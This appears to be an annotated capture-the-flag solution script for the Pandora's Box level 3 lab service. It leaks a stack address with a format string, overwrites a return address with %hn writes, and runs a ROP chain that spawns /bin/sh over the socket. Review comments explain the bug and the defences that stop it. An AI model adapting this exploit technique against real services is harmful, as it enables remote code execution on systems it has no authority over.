# A slightly different approach than used here http://jellevergeer.com/pandoras-box-level-3/
#
# This approach is different and avoids dealing the stack cookies
# Enjoy
#
# NOTE(review): this is a Python 2 script (print statements, str used as a
# byte buffer); it does not run unchanged on Python 3, and telnetlib was
# deprecated in 3.11 and removed in 3.13. It is a CTF write-up for a
# deliberately vulnerable lab service, tied to one specific binary build:
# every offset and gadget address below is for that build only.
import struct
import socket
import telnetlib
# Lab target; 192.168.56.x is a private (host-only style) range, so this
# presumably points at a local VM — confirm before running anything.
REMOTE = '192.168.56.101'
# REMOTE = '127.0.0.1'
PORT = 44101
mysocket = socket.socket()
mysocket.connect((REMOTE, PORT))
# Obtain a leaked stack address
# The service formats this input and echoes it back, so the '%08x' appears
# in the reply as 8 hex digits right after the '9999' marker. That the
# server accepts a caller-supplied format string is the root weakness;
# the fix on the server side is printf("%s", buf), never printf(buf).
mysocket.send('9999%08x' + '\n')
# Ensure all response data is returned
# NOTE(review): only the most recent recv() chunk is searched, so a marker
# split across two chunks is missed, and a closed connection (recv returns
# '') makes this loop spin forever — accumulate the data and bail out on ''.
while True:
    data = mysocket.recv(1024)
    addr_loc = data.find('9999')
    # 'is not -1' is an identity test on an int; it only works because
    # CPython caches small ints. Should be '!= -1'.
    if addr_loc is not -1:
        break
# 8 hex chars produced by '%08x' immediately after the marker.
addr = data[addr_loc+4:addr_loc+12]
print "leaked stack address is " + addr
# Calculate offsets for the return address of the function "start_game"
# The -48 / +278 deltas are relative to the leaked stack value and are
# specific to this binary and the author's environment (build-dependent).
start_game_addr = int(addr, 16) - 48
print "start_game address is " + hex(start_game_addr)
# Calculate offset for the future "/bin/sh" string sent next
bin_sh_addr = int(addr, 16) + 278
print "bin_sh address is " + hex(bin_sh_addr)
sploit = '9999'
sploit += struct.pack('<L', start_game_addr) # Offsets for 0x080485af (start_game)
# sploit += struct.pack('<L', 0xCCCCCCCC) # Debug values
sploit += struct.pack('<L', start_game_addr + 2) # Offsets for 0x080485af (start_game+2)
# sploit += struct.pack('<L', 0xDDDDDDDD) # Debug values
# Change return address from start_game to ROP bootstrap
# Two '%hn' half-word writes via positional parameters ($11, $12). This is
# the classic format-string write primitive; glibc built with
# -D_FORTIFY_SOURCE=2 refuses '%n'-family conversions when the format
# string lives in writable memory, which would stop this step. Because the
# write goes to a saved return address rather than through the buffer, a
# stack canary does not catch it (the "avoids stack cookies" remark above).
sploit += '%33521x%11$hn' # 0x080a8308 - add esp,0x10c; ret
sploit += '%34050x%12$hn' # 0x080a8308 - add esp,0x10c; ret
sploit += '\x41' * 0xba # Padding because above we moved 0x10c 'up' the stack
# All gadget addresses below are absolute 0x08xxxxxx values, i.e. a non-PIE
# 32-bit binary. Building the service as PIE (with ASLR enabled) would
# invalidate every one of them; the stack leak above only defeats stack
# randomisation, not code randomisation.
# Zero eax
sploit += struct.pack('<L', 0x0809807f) # xor eax,eax; ret
# Zero ecx + set ebx with addr of '/bin/sh'
sploit += struct.pack('<L', 0x080540cd) # pop ecx; pop ebx; ret
sploit += '\x00' * 4 + struct.pack('<L', bin_sh_addr) # Address of /bin/sh
# Zero edx
sploit += struct.pack('<L', 0x080540a6) # pop edx; ret
sploit += '\x00' * 4 # set edx to 0
# Set eax to 11 (syscall for execve)
# sploit += struct.pack('<L', 0xEEEEEEEE) # Debug value
sploit += struct.pack('<L', 0x0806ad3e) * 5 # inc eax; inc eax; ret
sploit += struct.pack('<L', 0x0806ad3f) # inc eax; ret
sploit += struct.pack('<L', 0x08054820) # int 0x80; ret
# And finally the '/bin/sh' string
sploit += '////////////////bin/sh\x00' # Padding then null terminated '/bin/sh'
# Bombs away
# NOTE(review): socket.send() may transmit only part of the buffer;
# sendall() is the call that guarantees the whole payload goes out.
mysocket.send(sploit)
# Drop into a interactive shell
tn = telnetlib.Telnet()
tn.sock = mysocket
tn.interact()